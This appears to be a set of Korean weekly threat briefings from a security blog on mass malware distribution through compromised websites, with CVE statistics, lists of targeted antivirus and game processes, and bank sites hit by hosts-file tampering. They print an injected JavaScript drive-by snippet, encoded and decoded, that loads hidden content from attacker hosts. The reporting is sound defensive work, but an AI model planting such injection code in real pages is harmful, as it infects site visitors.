-> if(document.cookie.indexOf('ralrlea')==-1){var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);document.cookie='ralrlea=Yes;path=/;expires='+expires.toGMTString();document.write(unescape("<iframe src='http://0ql.info/wm/huiwei/index.html' width='100' height='0' frameborder='0'></iframe>"));}



<실제 악성링크의 구조도>



정리하면 지난주에 활용 되었던 악성링크가 추가된 Malware net 40% 가량이 금주에 출현한 새로운 악성링크로 전환 되었으며 또한 규모도 전주보다 대폭 증가된 250여 곳 이상에서 관찰 되었습니다.

본 링크에 대한 공개는 대규모 피해 방지를 위해 공개합니다또한 악성링크의 내용은 수시로 변경이 되고 있으며, 1회 변경시 마다 250여개 이상의 웹사이트에서 동시에 방문자 감염이 이루어 지게 되어 있습니다공격자로서는 매우 효율적인 방식이며 차단 및 대응을 하는 측에서는 곤혹스러운 상태라 할 수 있습니다.

 

결론적으로 지금까지 사용 되어진 악성링크들을 반복해서 재활용 하는 형태는 여전 하며, 최종 설치되는 악성코드들도 동일한 유형을 계속 활용 하고 있습니다. 또한 행위 분석 방해를 위한 Virtual Machine 분석 회피 방안도 지속적으로 출현 중입니다한 가지 특이할 만한 사항은 저희쪽의 PCDS ( Pre Crime Detect System)을 회피하기 위해 3월에 이용 되었던 악성링크를 이번 대규모 악성코드 유포에 적극 활용 하였다는 점이며 이미 선 반영이 되어 향후에는 갱신된 실제 현황으로 브리핑이 가능 할 예정입니다.

 

 

악성링크 자체 및 웹서비스 전체적으로 문제점 개선이 이루어 지지 않고, 악성코드 유포 인지도 못하는 상태라서, 대응이 되지 않는 악순환이 계속 되고 있습니다. 이제 공격자들은 자유로운 재활용을 넘어, 악성코드에 감염된 좀비 PC의 대규모 확산을 위해 악성코드 유포지를 대폭 늘리고 직접 활용을 하는 단계로 전환 되었습니다. 또한 대규모 Malware net을 자유자재로 변경하고 활용 하는 현상이 추가 관찰 되어 향후의 위험성은 더욱 높아진 상태입니다.  지금까지의 브리핑에서 언급 하였던 예상과 동일하게 진행이 되고 있으며 지금까지 차단을 권고 드린 IP 대역 대부분을 모두 재활용 하였습니다. 만약 차단을 하셨다면 상당히 많은 좀비 PC 감염 및 APT의 위험을 사전에 예방 하실 수 있으셨습니다.

 

전체적으로 금주 국내 인터넷 서비스를 통한 악성코드 감염 및 좀비 PC 감염 비율은 상당히 높은 상태를 유지한 것으로 판단되며  금융권에 대한 정보유출을 위한 악성코드도  대규모 활동을 함으로써  강도 높은 경계 단계로 진입 합니다.

 

6 1주차 특징은 다음과 같습니다.

 

특징

·  · 다양한 취약성을 이용해 공격 성공 비율을 높이는 형태 계속

·  · 악성코드 유포지의 대폭 증가 및 대량 유포 현실화 - 향후 지속 될 것임

·  · 악성코드 유포자들의 전략적 행위 증가 및 범위 확대와 재활용 증가

          * 최대 250여 곳의 웹서비스가 동일 악성링크를 유포하는 것에 이용될 정도로 광범위한 증가

·  · 악성코드 분석 자체를 방해하기 위한 가상머신 우회기술, 루트킷(APT 형태) 유포 확대

·  · 3월부터 사용되었던 주요 악성링크 및 악성코드의 대규모 재활용 계속

·   은행 사용자를 겨냥한 Host 파일 변조 기능의 악성코드 유포 (홍콩으로 연결됨 

대규모로 유포된 게임 계정 탈취형 악성코드에 추가된 기능으로서 국내에 상당규모 유포 되었을 것으로 추정됨  Host 파일에 변조된 IP 주소는 123.254.xxx.92 (홍콩)


사이트명

은행명

은 행

www.kbstar.com

국민은행

kbstar.com

obank.kbstar.com

banking.nonghyup.com

농협

www.wooribank.com

우리은행

wooribank.com

pib.wooribank.com

bank.keb.co.kr

외환은행

www.keb.co.kr

 

* 악성링크를 중계하는 웹서비스의 증가는 웹서핑시 감염될 확률이 더욱 높아짐을 의미합니다.

 

* 유포지와 중계지의 의미는 사용자 관점 이나 악성링크의 관점에서 다를 수 있습니다. 저희는 사용자 관점에서 웹 서핑시 방문한 웹서비스가 문제가 있어서 감염이 된다면 직접 방문한 사이트는 ‘ 악성코드 유포지’ , 악성코드를 받아 오게 하는 임의의 주소를 ‘ 악성링크’ , 최종 사용자에게 감염을 일으키는 파일 자체를 ‘악성코드’ 로 정의 하고 있습니다.

 

사용자 PC에 대한 직접적인 공격을 일으키는 금주의 취약성은 주요 취약성 5개 가량에 집중이 되어 있으며 전주와 동일하게 Oracle Java 취약성에 대한 공격 비율이 가장 높은 비율을 차지 하고 있습니다. 또한 루트킷 및 APT 형태의 감염을 위해 사용자 PC에 디바이스 드라이버를 설치한 상태에서 내부 대역 스캔 및 특정 IP로 연결 하는 형태는 한번 감염시 막대한 피해를 감내해야 하는 부분이므로 강력한 보호 방안 수립이 요구 되고 있습니다. 

 

패치 이외에도 다양한 방안을 강구해야 문제 해결 할 수 있으며 현재 모든 보안 솔루션들이 사후 대응에 중점을 맞추고 있는데 가장 중요한 것은 사전에 대응이 얼마나 되고, 발생 가능한 위험을 제거 했느냐가 핵심이 되어야 합니다. 

 


·   Oracle Java 취약성, Adobe Flash 취약성 , MS Medi  IE 취약성이 같이 사용 되어 공격 성공 비율을 높이는 경우가 꾸준히 관찰 되고 있으므로 전체 보안 수준 관리에 노력을 기울일 필요가 있습니다.

 

·   각 기술분석 보고서에 기술된 루트킷 및 키로거, 백도어 기능을 가진 악성코드들은, 사용자 PC의 드라이버 및 시스템 파일 교체, 윈도즈 서비스 등록등을 실행하고, 내부망 스캔 및 키로깅 그리고 외부에서 명령을 대기하는 행위가 지속 관찰 되고 있어서 위험성이 높습니다.

 

·  기술분석보고서에 언급된 백도어들은 상당히 많은 악성링크들이 이용되고 있어서 현재 공격자들이 주력하는 부분으로 판단됩니다. 모두 시스템에서의 백신 프로세스를 중지 시키고 국내.외 거의 모든 게임에 대한 프로세스를 지속적으로 모니터링 하고 있으며 현재 목적은 게임계정 탈취로 보여지고 있으나 언제든 외부 도메인 연결과 업데이트를 통해 다른 형태로 전환이 될 수 있습니다.

 

모니터링 하는 프로세스의 종류는 하기와 같으며 국내의 대부분 백신 이외에도 넥슨의 OTP까지 모니터링을 하고 있습니다. 게임종류는 국내.외 게임사들의 주력 게임들이 모두 해당 되고 있습니다. OTP 관련 프로세스에 대한 후킹이나 모니터링이 된다는 것은 계정 도용 및 탈취를 막기 위한 보호대책을 추가적으로 모색해야 하는 상황으로 보여집니다금융권도 다르지 않습니다.

 ·

프로세스명

프로그램명

백 신

sgbider.exe

vcsvc.exe

vcsvcc.exe

바이러스체이서

NVCAgent.npc

nsvmon.npc

Nsavsvc.npc

NaverAgent.exe

네이버백신

V3LRun.exe

MUpdate2.exe

SgSvc.exe

V3Light.exe

V3LTray.exe

V3LSvc.exe

V3

AYUpdSrv.aye

AYRTSrv.aye

SkyMon.exe

AYServiceNT.aye

AYupdate.aye

AyAgent.aye

알약

PCOTP.exe

넥슨 OTP

게 임

gamehi.co.kr

게임하이

hangame.com

한게임

netmarble.net

넷마블

Raycity.exe

레이시티

ff2client.exe

피파 온라인2

pmang.com

피망

df.nexon.com

dnf.exe

던전 앤 파이터

DragonNest.exe

드래곤 네스트

WinBaram.exe

바람의 나라

heroes.exe

마비노기 영웅전

wow.exe

월드 오브 워크래프트

lin.bin

리니지

MapleStory.exe

메이플 스토리

 

 본 보고서에 기술되는 내용들은 이메일등을 이용한 소규모 침투가 아니라 웹서비스를 통한 대량 유포 및 감염입니다. 

APT 형태가 사용하는 유포 취약성은 대부분 Java 취약성에 집중 되고 있습니다. 대응에 참고 하십시요.

 

사용된 취약성 비율







- CVE 2011-3544 ( 27.8%) Java Applet 취약성 

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544

- CVE 2012-0507 ( 12.4%) Java Applet 취약성 - Java Web start 취약성

- CVE 2012-0003 (22.7%) Windows Midi 취약성 – 

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0003 전문분석보고서 참고

- CVE 2012-0754 (15.4%) Flash 취약성  

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0754

- CVE 2010-0806 (12.7%) IE 취약성 ( IE 6,7 대상)

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806


 -CVE 2011-2140 (8.2%) Adobe Flash 취약성

- CVE 2011-1255 (0.4%) IE 취약점

- CVE 2011-2110 (0.08%) Adobe Flash 취약성

 

금주에 이용된 취약성에서는 기존에 적극적으로 이용되던 5가지 가량의 주요 취약성 이외에도 자주 사용되지 않던 IE  Flash 취약성의 활용도 일부 감지 되어 향후 변화가 예상 됩니다.

 



< 6월 1주차 악성링크의 국가별 통계>

금주의 차단 추가 영역은 다음과 같습니다. 아래 영역은 이미 공격자가 권한을 통제하고 있는 IP 대역들이며 해당 IP 대역들은 이전 리스트에서도 계속 재활용이 되고 있습니다. 기업 및 기관에서는 해당 IP 대역 차단 이후 ( 업무 관련성 여부에 대해서는 각기관 및 기업별 검토 필요) 차단 수치에 대해서 살펴 보시면 현재 상태의 위험이 얼마나 되는지 실감 하실 수 있으시며 매우 높은 수치임을 아실 수 있습니다.



4월부터 차단 권고 드린 IP 대역은 금주에도 계속 재활용이 되었습니다. 강력한 차단을 유지하실 것을 권고 합니다.

 


차단 권고 대역


현재 공격자들도 전략적인 움직임을 보이고 있어서 공개적으로 IP 대역을 알리는 부분은 보고서 구독 고객에게만 한정하여 제공될 예정입니다.


감사합니다.

 

*시범 서비스는 순차적으로 1개월 경과시 종료 됩니다. 4회 이상을 보고서를 받으셨다면 그 이전에 정식 구독서비스를 신청하셔야 보고서가 누락되지 않습니다.  KAIST CSRC 주간보안동향 보고서는 1p 짜리의 요약형태로 작성이 되며 무료 배포가 가능합니다. 해당 서비스의 신청은csyong95@kaist.ac.kr 로 신청 하시면 됩니다.

 

* 정식 구독 서비스 가입 및 시범 서비스 신청은 info@bitscan.co.kr 이며 기관명/ 담당자/ 연락처 기재가 필요하며 시범은 기관/기업별 1회에 한정 합니다. 주위의 기업 및 기관들에게 정보 차원의 전달 가능합니다.

 

* 본 분석은 악성링크 자체의 수집은 빛스캔의 PCDS (Pre crime detect system)를 통해  수집하며, 악성링크 및 악성코드 분석은 KAIST 사이버보안연구센터, 정보보호대학원과 공동으로 진행합니다.

 

Posted by 바다란

 빛스캔과 KAIST 사이버보안센터에서 공동 운영하는 보안정보 제공 서비스 5 5주차 내용입니다본 정보제공 서비스는 국내에서 발생되는 악성코드 유포에 대해 직접적으로 분석을 함으로써 위험의 흐름과 대응에 대해서 알 수 있도록 하기 위한 것이 주된 목적이며차주부터 대규모로 확장된 상태로 운영 되고 있어서국내 인터넷 위협에 대한 주간 동향으로 참고하셔도 충분 할 것입니다.


 본 보고서의 활용 용도는 다음과 같은 활용이 가능합니다.


1. 악성링크 및 악성코드 유포에 이용되는 IP 대역 차단을 통한 좀비 PC 감염 방지

2. 악성링크가 공격에 활용하는 주된 취약성에 대한 내부 보안 강화 정책 - 패치

3. 내부 감염된 APT 공격의 확인 및 제거에 활용 ( 각 개별 기술 분석 참고)


금주 차의 특징은 2주전부터 언급 드렸던 공격자들의 전략적인 공격이 대폭 확대 되는 특징을 보이고 있습니다신규 악성링크 및 악성코드들은 전주와 대동소이한 양상을 보이고 있으나실제 악성링크 하나가 최소 10 ~ 최대 100 개 이상의 웹서비스에서 동시에 중계된 사례가 발생 하였습니다즉 중간 경로를 이용한 효율적 공격들이 대거 관찰 되고 있어서 전주 대비 영향력 면에서는 비교하기가 어려울 정도로 위험성이 높은 상태 입니다.

 

금주의 악성코드 유포지로 이용된 웹서비스들은 412곳 이상이며 전주 대비 대폭 증가 되었으며 현재도 매우 활발하게 범위를 확산 시키고 있고 단 이틀 만에 백여 개 이상의 취약한 웹서비스들에 악성링크를 추가하는 적극적인 공격이 계속 되고 있습니다악성링크가 삽입된 웹서비스들의 대응이 많이 부족한 상태라 계속 재발 되고 있으며대규모 감염을 시키기 위해 사용자가 방문 시 감염 될 수 있는 사이트들을 대규모로 확장하여 거대 네트워크를 운영 중입니다기존의 봇넷과는 다른 형태의 악성코드 전파용 네트워크라 할 수 있습니다Malware net 이라 불러야 할 정도로 판단됩니다.


 




대표적으로 대규모 확산된 악성링크는 http://www.xxxxxx.com/script/js/script.js 이며 국내 주요 웹서비스 100여곳 이상의 웹서비스 코드에 해당 링크가 추가 되어 방문시 마다 자동 실행을 통해 좀비 PC 감염을 확대 하고 있습니다본 요약을 작성하는 현재 6.6일 오후 3시에도 운영이 되고 있으며 내부에 들어 있는 코드는 다음과 같습니다.


* 본 링크에 대한 공개는 공개된 글로 언급하는 것은 부적절하여 언급 하지 않도록 합니다.  현재 악성링크의 내용은 수시로 변경이 되고 있으며, 1회 변경시 마다 100여개 이상의 웹사이트에서 동시에 방문자 감염이 이루어 지게 되어 있습니다. 공격자로서는 매우 효율적인 방식이며 차단 및 대응을 하는 측에서는 곤혹스러운 상태라 할 수 있습니다.

 


if(document.cookie.indexOf('ralrlea')==-1){var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);document.cookie='ralrlea=Yes;path=/;expires='+expires.toGMTString();document.write(unescape("%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%35%30%2E%31%31%37%2E%31%31%33%2E???%2F%70%69%63%2F%69%6D%67%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E"));}


Hex  Decode 


-> if(document.cookie.indexOf('ralrlea')==-1){var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);document.cookie='ralrlea=Yes;path=/;expires='+expires.toGMTString();document.write(unescape("<script src=http://50.117.113.XXX/pic/img.js></script>"));}

 

이처럼 중간 경로를 가지고 최종 사용자를 공격하는 악성코드들을 자유롭게 변경하고 대규모로 운영을 할 수 있는 상황이 현재입니다.



결론적으로 지금까지 사용 되어진 악성링크들을 반복해서 재활용 하는 형태는 여전 하며최종 설치되는 악성코드들도 동일한 유형을 계속 활용 하고 있습니다또한 행위 분석 방해를 위한 Virtual Machine 분석 회피 방안도 지속적으로 출현 중이나 현재 분석 및 대응이 완료된 상태로 분석에는 문제가 없는 상태를 유지 하고 있습니다.

 

악성링크 자체 및 웹서비스 전체적으로 문제점 개선이 이루어 지지 않고악성코드 유포 인지도 못하는 상태라서대응이 되지 않는 악순환이 계속 되고 있습니다이제 공격자들은 자유로운 재활용을 넘어악성코드에 감염된 좀비 PC의 대규모 확산을 위해 악성코드 유포지를 대폭 늘리고 직접 활용을 하는 단계로 전환 되었습니다전주의 예상 드린 바와 동일하게 진행이 되고 있으며 5 4주차에 차단을 권고 드린IP 대역 대부분을 모두 재활용 하였습니다만약 차단을 하셨다면 상당히 많은 좀비 PC 감염 및 APT의 위험을 사전에 예방 하실 수 있으셨습니다.

 

전체적으로 금주 국내 인터넷 서비스를 통한 악성코드 감염 및 좀비 PC 감염 비율은 상당히 높은 상태를 유지한 것으로 판단되며 주의 단계를 지난 상태로 보입니다.

 

5 5주차 특징은 다음과 같습니다.


 

특징

  • · 다양한 취약성을 이용해 공격 성공 비율을 높이는 형태 계속
  • · 악성코드 유포지의 대폭 증가 및 대량 유포 현실화 - 향후 지속 될 것임
  • · 악성코드 유포자들의 전략적 행위 증가 및 범위 확대

          * 최대 100여 곳의 웹서비스가 동일 악성링크를 유포하는 것에 이용될 정도로 광범위한 증가

  • · 악성코드 분석 자체를 방해하기 위한 가상머신 우회기술루트킷(APT 형태유포 확대
  • · 4월부터 사용되었던 주요 악성링크 및 악성코드의 대규모 재활용 계속

 

악성링크를 중계하는 웹서비스의 증가는 웹서핑시 감염될 확률이 더욱 높아짐을 의미합니다.


*유포지와 중계지의 의미는 사용자 관점 이나 악성링크의 관점에서 다를 수 있습니다저희는 사용자 관점에서 웹 서핑시 방문한 웹서비스가 문제가 있어서 감염이 된다면 직접 방문한 사이트는 ‘ 악성코드 유포지’ , 악성코드를 받아 오게 하는 임의의 주소를 ‘ 악성링크’ , 최종 사용자에게 감염을 일으키는 파일 자체를 ‘악성코드’ 로 정의 하고 있습니다.

 


사용자 PC에 대한 직접적인 공격을 일으키는 금주의 취약성은 주요 취약성 5개 가량에 집중이 되어 있으며 전주와 동일하게 Oracle Java 취약성에 대한 공격 비율이 가장 높은 비율을 차지 하고 있습니다또한 루트킷 및 APT 형태의 감염을 위해 사용자 PC에 디바이스 드라이버를 설치한 상태에서 내부 대역 스캔 및 특정 IP로 연결 하는 형태는 한번 감염시 막대한 피해를 감내해야 하는 부분이므로 강력한 보호 방안 수립이 요구 되고 있습니다


패치 이외에도 다양한 방안을 강구해야 문제 해결 할 수 있으며 현재 모든 보안 솔루션들이 사후 대응에 중점을 맞추고 있는데 가장 중요한 것은 사전에 대응이 얼마나 되고발생 가능한 위험을 제거 했느냐가 핵심이 되어야 합니다감염 이후에 대응은 휠씬 더 큰 피해를 입은 이후에 많은 비용과 자원 투입이 되어야 복구가 된다는 점을 잘 알고 계실 것 같습니다.


  •  Oracle Java 취약성, Adobe Flash 취약성 , MS Medi  IE 취약성이 같이 사용 되어 공격 성공 비율을 높이는 경우가 꾸준히 관찰 되고 있으므로 전체 보안 수준 관리에 노력을 기울일 필요가 있습니다.

 

  • 1,2,5 기술보고서에 언급된 루트킷 및 키로거백도어 기능을 가진 악성코드들은사용자 PC의 드라이버 및 시스템 파일 교체윈도즈 서비스 등록등을 실행하고내부망 스캔 및 키로깅 그리고 외부에서 명령을 대기하는 행위가 지속 관찰 되고 있어서 위험성이 높습니다.

      * 해당 보고서들은 정식 구독 신청 및 시범 서비스 신청하신 기관/기업에만 제공 됩니다. 

  • 4번 기술분석보고서에 언급된 백도어들은 상당히 많은 악성링크들이 이용되고 있어서 현재 공격자들이 주력하는 부분으로 판단됩니다.모두 시스템에서의 백신 프로세스를 중지 시키고 국내.외 거의 모든 게임에 대한 프로세스를 지속적으로 모니터링 하고 있으며 현재 목적은 게임계정 탈취로 보여지고 있으나 언제든 외부 도메인 연결과 업데이트를 통해 다른 형태로 전환이 될 수 있습니다.



모니터링 하는 프로세스의 종류는 하기와 같으며 국내의 대부분 백신 이외에도 넥슨의 OTP까지 모니터링을 하고 있습니다게임종류는 국내.외 게임사들의 주력 게임들이 모두 해당 되고 있습니다. OTP 관련 프로세스에 대한 후킹이나 모니터링이 된다는 것은 계정 도용 및 탈취를 막기 위한 보호대책을 추가적으로 모색해야 하는 상황으로 보여집니다. 금융권도 다르지 않습니다.


프로세스명

프로그램명

백 신

sgbider.exe

vcsvc.exe

vcsvcc.exe

바이러스체이서

NVCAgent.npc

nsvmon.npc

Nsavsvc.npc

NaverAgent.exe

네이버백신

V3LRun.exe

MUpdate2.exe

SgSvc.exe

V3Light.exe

V3LTray.exe

V3LSvc.exe

V3

AYUpdSrv.aye

AYRTSrv.aye

SkyMon.exe

AYServiceNT.aye

AYupdate.aye

AyAgent.aye

알약

PCOTP.exe

넥슨 OTP

게 임

gamehi.co.kr

게임하이

hangame.com

한게임

netmarble.net

넷마블

Raycity.exe

레이시티

ff2client.exe

피파 온라인2

pmang.com

피망

df.nexon.com

dnf.exe

던전 앤 파이터

DragonNest.exe

드래곤 네스트

WinBaram.exe

바람의 나라

heroes.exe

마비노기 영웅전

wow.exe

월드 오브 워크래프트

lin.bin

리니지

MapleStory.exe

메이플 스토리

 

  • 5 2주차에 발견된 가상머신 실행을 감지(Vmware  magic number)하고 종료하거나 분석을 회피하도록 설계된 악성코드의 대량 유포는 계속 진행 되고 있습니다.

 

· 항상 말씀드리지만 루트킷 또는 APT 유형은 감염 즉시 심각한 피해를 장기적으로 유발 할 수 있으므로 심각한 주의가 필요합니다더군다나 본 보고서에 기술되는 내용들은 이메일등을 이용한 소규모 침투가 아니라 웹서비스를 통한 대량 유포 및 감염입니다


APT 형태가 사용하는 유포 취약성은 대부분 Java 취약성에 집중 되고 있습니다대응에 참고 하십시요.


 

사용된 취약성 비율

- CVE 2011-3544 ( 24.2%) Java Applet 취약성 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544

- CVE 2012-0507 ( 28.3%) Java Applet 취약성 - Java Web start 취약성

- CVE 2012-0003 (20.2%) Windows Midi 취약성 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0003 3월의 전문분석보고서를 참고

- CVE 2012-0754 (26.3%) Flash 취약성 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0754

- CVE 2010-0806 (1.0%) IE 취약성 ( IE 6,7 대상http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806

 

금주의 차단 추가 영역은 다음과 같습니다아래 영역은 이미 공격자가 권한을 통제하고 있는 IP 대역들이며 해당 IP 대역들은 이전 리스트에서도 계속 재활용이 되고 있습니다기업 및 기관에서는 해당 IP 대역 차단 이후 ( 업무 관련성 여부에 대해서는 각기관 및 기업별 검토 필요차단 수치에 대해서 살펴 보시면 현재 상태의 위험이 얼마나 되는지 실감 하실 수 있으시며 매우 높은 수치임을 아실 수 있습니다.

4월부터 차단 권고 드린 IP 대역은 금주에도 계속 재활용이 되었습니다강력한 차단을 유지하실 것을 권고 합니다.

 

차단 권고 대역

각 개별 분석보고서에는 별도의 차단 대역들이 존재하니 참고 하시고 사안별로 모니터링 및 차단에 활용 하십시요.

 

-본 지면에서는 공개 하지 않습니다.

 

현재 공격자들도 전략적인 움직임을 보이고 있어서 공개적으로 IP 대역을 알리는 부분은 보고서 구독 고객에게만 한정하여 제공될 예정입니다.

 

*시범 서비스는 순차적으로 1개월 경과시 종료 됩니다. 4회 이상을 보고서를 받으셨다면 그 이전에 정식 구독서비스를 신청하셔야 보고서가 누락되지 않습니다 KAIST CSRC 주간보안동향 보고서는 1p 짜리의 요약형태로 작성이 되며 무료 배포가 가능합니다해당 서비스의 신청은csyong95@kaist.ac.kr 로 신청 하시면 됩니다.
 
정식 구독 서비스 가입 및 시범 서비스 신청은 info@bitscan.co.kr 이며 기관명담당자연락처 기재가 필요하며 시범은 기관/기업별 1회에 한정 합니다주위의 기업 및 기관들에게 정보 차원의 전달 가능합니다.
 
본 분석은 악성링크 자체의 수집은 빛스캔에서 수행하며악성링크 및 악성코드 분석은 KAIST 사이버보안센터정보보호대학원과 공동으로 진행합니다.

Posted by 바다란

안녕하세요전 상훈입니다.

 

빛스캔과 KAIST 사이버보안센터에서 공동 운영하는 보안정보 제공 서비스 5 4주차 내용입니다본 정보제공 서비스는 국내에서 발생되는 악성코드 유포에 대해 직접적으로 분석을 함으로써 위험의 흐름과 대응에 대해서 알 수 있도록 하기 위한 것이 주된 목적입니다.

 

금주의 가장 큰 특징은 신규 악성링크는 줄어든 비율을 보이고 있으며악성링크를 통해 유포되는 실제 악성코드들도 신규 유형은 대폭의 감소를 보이고 있습니다그러나 실제 악성코드를 사용자들에게 감염 시키는 악성코드 유포지의 수치는 전주 대비 50% 이상 증가한 것으로 확인이 되고 있습니다.

 

최종적인 한주간의 특징을 살펴보면 지금껏 활용 되어왔던 악성링크들의 재활용 증가 및 사용자 PC에 설치되는 악성코드들의 재활용도 증가 하고 있으며 이 악성코드를 대규모 유포를 하기 위해 사용자가 방문 시 감염 될 수 있는 사이트들을대규모로 늘리고 있는 것으로 판단 됩니다.

 

 결론적으로 보면 지금까지 사용 되어진 악성링크들을 반복해서 재활용을 하고 있으며 최종 설치되는 악성코드들도 동일한 유형을 계속 활용 하고 있습니다대응이 되지 않고 있어서 자유롭게 활용을 하고 있으며 , 대규모 확산을위해 악성코드 유포지를 대폭 늘리는 상황이 금주에 관찰된 가장 큰 이슈가 되겠습니다. 즉 감염 PC의 대규모적인 확대를 꾀하고 있는 것으로 관찰 되고 있습니다.

 

 

금주의 큰 특징은 다음과 같습니다.

 

특징

·  다양한 취약성을 이용해 공격 성공 비율을 높이는 형태 계속

·  악성코드 유포지의 대폭 증가 현상 관찰  - 향후 주의 필요

·  악성코드 유포자들의 전략적 행위 증가  범위 확대 계속

·   악성코드 분석 자체를 방해하기 위한 가상머신 우회기술,  루트킷 유포 발견

·   4월부터 사용되었던 주요 악성링크  악성코드의 대규모 재활용 계속

·   악성링크의 추가와 제거가  보고서 발송일 까지도 간헐적으로 계속 


악성링크를 중계하는 웹서비스의 증가는 웹서핑시 감염될 확률이 더욱 높아짐을 의미합니다.


*유포지와 중계지의 의미는 사용자 관점 이나 악성링크의 관점에서 다를 수 있습니다저희는 사용자 관점에서 웹 서핑시 방문한 웹서비스가 문제가 있어서 감염이 된다면 직접 방문한 사이트는 ‘ 악성코드 유포지’ , 악성코드를 받아 오게 하는 임의의 주소를 ‘ 악성링크’ , 최종 사용자에게 감염을 일으키는 파일 자체를 악성코드’ 로 정의 하고 있습니다.






사용자 PC에 대한 직접적인 공격을 일으키는 금주의 취약성은  주요 취약성 5개 가량에 집중이 되어 있으며 전주와 동일하게  Oracle Java 취약성에 대한 공격 비율이 가장 높은 비율을 차지 하고 있습니다

강력하게 사내 및 해당 기관이나 기업에 보안패치 권고를 해야만 합니다패치를 하지 않을 경우 문제를 해결 할 수 있는 방안은 인터넷 사용 금지 외엔 없습니다.

 

Oracle Java 취약성, Adobe Flash 취약성 , MS Medi  IE 취약성이 같이 사용 되어 공격 성공 비율을 높이는 경우가 계속 관찰 되고 있으므로 전체 보안 수준 관리에 노력을 기울일 필요가 있습니다.

 

·   3번 기술보고서에 언급된 루트킷은 이미 해외 백신 일부에서는 탐지하고 있는 내용이며 사용자 PC의 드라이버를 교체하여 상주하며 향후 APT 및 내부에 대한 추가 공격과 같은 다양한 위험요소를 만들 수 있습니다전문 분석은 향후 진행될 예정이며 간략한 분석 내용은 threatexpert에 저희쪽에서 올려 간단히 체크된 내용을 참고 하십시요.  - 본 게시물에서는 생략합니다.


 

·   전주에 이어서 금주에도 가상머신 실행을 감지하고 종료하거나 분석을 회피하도록 설계된 악성코드가 대량 유포 되었습니다본 내용은 향후 전문분석을 통해 상세하게 전달이 될 예정입니다.


·  게임 계정을 해킹 하는 코드들이 대량으로 유포 되고 있으며 대상 게임은  엔씨 -리니지 , 한게임 -테라 , 넥슨 -메이플스토리,엘소드블리자드-와우, CJ인터넷 - 피파온라인네오플-던파 이며  디아블로에 대한 계정 탈취 유형도 발견 될 것으로 보입니다.


·  항상 말씀드리지만 루트킷 또는 APT 유형은 감염 즉시 심각한 피해를 장기적으로 유발   있으므로 심각한 주의가 필요합니다더군다나  보고서에 기술되는 내용들은 이메일등을 이용한 소규모 침투가 아니라 웹서비스를 통한 대량 유포  감염입니다.  APT 형태가 사용하는 유포 취약성은 대부분 Java 취약성에 집중 되고 있습니다.  대응에 참고 하십시요.

 


사용된 취약성

 

- CVE 2011-3544 ( 23.6%)  Java Applet 취약성 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544

- CVE 2012-0507 ( 24.7%) Java Applet 취약성 - Java Web start 취약성

- CVE 2012-0003 ( 20.2%) Windows Midi 취약성 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0003 3월의 전문분석보고서를 참고 

- CVE 2012-0754 (21.3%)  Flash 취약성 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0754

- CVE 2010-0806 (9.0%)  IE 취약성 ( IE 6,7 대상http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806

 


<5월 4주차 주간 동향 보고서의 누적 취약성 통계>

 

전주 대비 특이 사항으로는 Java applet 취약성을 노린 공격 및 Windows Midi 관련된 공격이 전주의 급증세를 유지하고 있습니다전주와 대비해 달라진 취약성 비율과 공격의 자세한 변화들에 대해서는 5월 4주차 동향분석 보고서를 참고 하십시요.

 

 

금주의 차단 추가 영역은 다음과 같습니다아래 영역은 이미 공격자가 권한을 통제하고 있는 IP 대역들이며 해당 IP 대역들은 이전 리스트에서도 계속 재활용이 되고 있습니다기업 및 기관에서는 해당 IP 대역 차단이후 ( 업무 관련성 여부에 대해서는 각기관 및 기업별 검토 필요차단 수치에 대해서 살펴 보시면 현재 상태의 위험이 얼마나 되는지 실감 하실 수 있으시며 매우 높은 수치임을 아실 수 있습니다.

 

4월부터 차단 권고 드린 IP 대역은 금주에도 매우 활발하게 재활용이 되었습니다강력한 차단을 계속 유지 하셔야만 안정성을 확보   있습니다.

 


차단 권고 대역


* 본 게시물에서는 차단 대역의 게재를 하지 않으며 서비스 제공 받는 고객사에만 제공이 됩니다.




현재 공격자들도 전략적인 움직임을 보이고 있어서 공개적으로 IP 대역을 알리는 부분은 보고서 구독 고객에게만 한정하여 제공할 예정이며 기본 동향에 대해서만 언론에 브리핑 될 예정이니 참고 하십시요중앙대 전산원 기사http://www.dailysecu.com/news_view.php?article_id=2251 와 연관된 내용인 abcmart 의 기사가 보안뉴스에 게재 (http://www.boannews.com/media/view.asp?idx=31441 )  되어 있으나 해킹 및 가격 오류 소동에 관해 해킹이 아니라는 해명을 하고 있습니다. 저희쪽에 관련 사례가 있어서 정리 되는 대로 기사 기고 예정입니다참고 하십시요.

 

 

시설 확장을 통해 그 동안 국내 도메인 중 추가 확보된 도메인과 해외 도메인을 더 추가하여 악성링크의 움직임에 대해 폭넓은 관찰을 현재 실시하고 있습니다보다 더 정확성 있고 현실적인 위협정보들을 제공 할 수 있도록 하겠습니다.

 

 

*시범 서비스는 순차적으로 1개월 경과시 종료 됩니다. 4 이상을 보고서를 받으셨다면  이전에 정식 구독서비스를 신청하셔야 보고서가 누락되지 않습니다.  

첨부 파일중 KAIST CSRC 주간보안동향 보고서는 1p 짜리의 요약형태로 작성이 되며 무료 배포가 가능합니다해당 서비스의 신청은 csyong95@kaist.ac.kr  신청 하시면 됩니다.

 

정식 구독 서비스 가입  시범 서비스 신청은 info@bitscan.co.kr 이며 기관명담당자연락처 기재가 필요하며 시범은 기관/기업별 1회에 한정 합니다주위의 기업  기관들에게 정보 차원의 전달 가능합니다.

 

